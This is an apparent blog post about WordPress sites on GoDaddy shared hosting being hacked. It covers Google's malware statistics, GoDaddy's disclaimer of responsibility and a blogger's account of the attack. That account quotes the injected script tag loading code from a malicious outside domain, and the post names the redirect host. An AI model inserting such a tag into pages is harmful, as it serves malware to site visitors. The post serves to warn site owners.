Godaddy: “Website Security Is Your Responsibility”
Shared Server Blogs Hacked En Mass At Godaddy
Google’s Online Security Blog (August 2009):
Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.
Another disturbing trend is many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.
But still… that’s a lot of malicious code and a lot of websites.
And just last weekend, Wordpress blogs hosted at Godaddy were hit with an interesting exploit that was not immediately detectable. Seems the malicious executable only kicked-in when traffic was referred from Google. So that made the exploit less obvious.
The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.
In the view source mode, there was a script src redirect just above the </body> tag in all the .php files. And the infected website will redirect to “burnvirusnow34.xorg.pl.”
But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog’s world.
However it is not known how the hackers are accessing the hosting accounts.
Of course Godaddy has issued a statement regarding shared hosting security measures. But they have also stated, “The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.”
Then they make standard comments alluding to your responsibilities as a website owner.
“The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”
A blogger posted the following at Wordpress’s site regarding last weekends Godaddy assault.
“My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:
<script src=”http://cechirecom.com/js.php”></script>
I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.”